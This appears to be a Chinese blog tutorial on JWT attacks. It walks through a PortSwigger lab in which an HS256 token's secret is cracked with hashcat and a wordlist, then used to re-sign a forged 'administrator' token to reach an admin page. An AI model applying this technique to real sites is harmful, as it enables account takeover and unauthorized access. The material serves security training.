6种常见的JWT Attack,绕过网站身份验证 - 3.爆力破解对称式加密签名

时间：2024-04-07 11:04:27浏览次数：16

标签：... 爆力 JWT 身份验证 token 签名 key

简介

JWT攻击是使用者向网站发送修改后的JWT，目标是冒充另一个身份的使用者，并绕过身份验证和存取控制。如果攻击者能够使用任意值创建自己的JWT有效令牌，他们能够升级自己的权限或冒充其他用户，完全控制他们的帐户。

JWT常见攻击手法有以下几种：

签名未验证
JWT无签名
爆力破解对称式加密签名
用kid绕过对称式加密签名
用JWK绕过非对称式加密签名
用JKU绕过非对称式加密签名

关于JWT的介绍可参考json web token介绍

3.爆力破解对称式加密签名

某些签名算法，像是HS256（HMAC+SHA-256），可以使用任意字符串做为密钥，因此可以透过爆力密码破解得到密钥，并使用密钥重签名

举例如下，以下是访问网站的JWT token，需要administrator身份才能访问，而且使用HS256签名

################ request ################
GET /admin HTTP/1.1
Host: 0aff00980379e949c0ec224a00f90071.web-security-academy.net
Cookie: session=eyJraWQiOiJkYjFiZWEzOS05MjQwLTRjYjItODQ0MS04NjZjMjIxZDFmODUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NzYwNjgwNH0.faMYDNGlalEN2C5YD2NGaRejmOAIXj1GQ2priBVj3yE
...omit...

################ response ################ 
...omit...Admin interface only available if logged in as an administrator...omit...

所以直接改成adminstrator没有用，还必须要得到签名用的secret key，在重新根据修改内容重新签名才行，步骤如下

step1，找出secret key

先准备一组密码档jwt.secrets.list，内容可以参考https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

然后透过hastcat尝试爆力破解目前token

hashcat -a 0 -m 16500 eyJraWQiOiJkYjFiZWEzOS05MjQwLTRjYjItODQ0MS04NjZjMjIxZDFmODUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NzYwNjgwNH0.faMYDNGlalEN2C5YD2NGaRejmOAIXj1GQ2priBVj3yE jwt.secrets.list

破解后会发现secret key为secret1

step2，产生JWT key

在JWT editor keys中选择new symmetric key, 按下generate会产生以下内容

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>{
    "kty": "oct",
    "kid": "6e45657d-202e-4e74-a50d-0c8f785dc1cf",
    "k": "qzlgHvHrjWoqNS_9Jd_1EQ"
}</code></span></span>

将刚刚的secret key使用base64编码得到c2VjcmV0MQ==，然后贴上如下

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>{
    "kty": "oct",
    "kid": "6e45657d-202e-4e74-a50d-0c8f785dc1cf",
    "k": "c2VjcmV0MQ=="
}</code></span></span>

step3. 对修改的内容重签名

在JWT editor将原本的token内容改为administrator如下

<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>{
    "iss": "portswigger",
    "sub": "administrator", 
    "exp": 1657606804
}</code></span></span>

接着在JWT editor中点选sign，然后选择以下配置

signing key: you generated in the JWT editor keys
signing algorithm: HS256
header options: don't modify header

就会根据token修改的内容，产生相对应的签名，使用这全新token就可以用administrator身份访问admin功能

其他方法可参考

6种常见的JWT attack方法

Web Security Academy

标签：...,爆力,JWT,身份验证,token,签名,key
From： https://blog.csdn.net/raymond0820/article/details/137455612

JWT
1.概念JSONWebTokens，一种紧凑的Claims声明格式，旨在用于空间受限的环境进行传输，常见的场景如HTTP授权请求头参数和URI查询参数。JWT会把Claims转换成JSON格式，而这个JSON内容将会应用为JWS结构的有效载荷或者应用为JWE结构的（加密处理后的）原始字符串，通过消息认证码（MessageAuthen......
jwt实现登录和接口实现动态权限
[Authorize] ==== usingMicrosoft.AspNetCore.Authorization; 登录的DTOnamespacelogin;publicclassWeatherForecast{publicDateOnlyDate{get;set;}publicintTemperatureC{get;set;}publicintTemperatureF=>32+(in......
C# .NET6 WebAPI JWT身份验证服务
自定义扩展类usingMicrosoft.AspNetCore.Authentication;usingMicrosoft.AspNetCore.Authentication.JwtBearer;usingMicrosoft.AspNetCore.Mvc;usingMicrosoft.AspNetCore.Mvc.ModelBinding;usingSystem.Text.Json;namespaceDemo{///<summary>///......
C# 生成JWT
usingMicrosoft.IdentityModel.Tokens;usingSystem.IdentityModel.Tokens.Jwt;usingSystem.Security.Claims;usingSystem.Text;namespaceDemo{///<summary>///Token处理类///</summary>publicclassToken{///<......
云原生最佳实践系列 6：MSE 云原生网关使用 JWT 进行认证鉴权
方案概述MSE网关可以为后端服务提供转发路由能力，在此基础上，一些敏感的后端服务需要特定认证授权的用户才能够访问。MSE云原生网关致力于提供给云上用户体系化的安全解决方案，其中JWT认证能力是在JsonWebToken这种结构化令牌的基础上实现了一套基于用户体系对用户的API（服......
token、jwt 和 jwt刷新token
概念涉及到身份验证和授权的机制。Token概念：在网络通信中，Token是一个用于身份验证和授权的令牌。它通常是一个字符串，由服务端生成并发送给客户端，客户端在后续的请求中携带该令牌以证明自己的身份。Token可以是任意形式的字符串，比如随机生成的字符串、加密后的......
JWT示例与原理
简介JWT(JSONWebToken)是一种去中心化的web认证方案，信息存储在客户端。数据结构JWT通常由3部分组成，Header、Payload、Signature。每个部分都是用Base64Url编码后的字符串，每个部分之间由点分割。形如Header.Payload.Signature注:Base64Url是Base64的一个变种，主要是将Base6......
使用egg.js发送jwt
下载jwt 配置jwtpnpmiegg-jwt plugin.js/**@typeEgg.EggPlugin*/module.exports={jwt:{enable:true,package:'egg-jwt'}};config.default.jsconfig.jwt={secret:"hakurei77"//密钥}创建中间层 app->......
Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467)
ApacheOFBizAuthenticationBypassVulnerability(CVE-2023-51467)ApacheOFBizAuthenticationBypassVulnerability(CVE-2023-51467)PublishedbyDikshaOjhaonDecember27,2023SonicWall威胁研究团队在基于Java的Web框架ApacheOFBiz中发现了身份验证绕......
jwt编码
JWT（jsonwebtoken）JSONWebToken(JWT)是一个开放标准(RFC7519)，它定义了一种紧凑的、自包含的方式，用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任，因为它是数字签名的。这边流量包的cookie中存在jwt编码header：payload： ......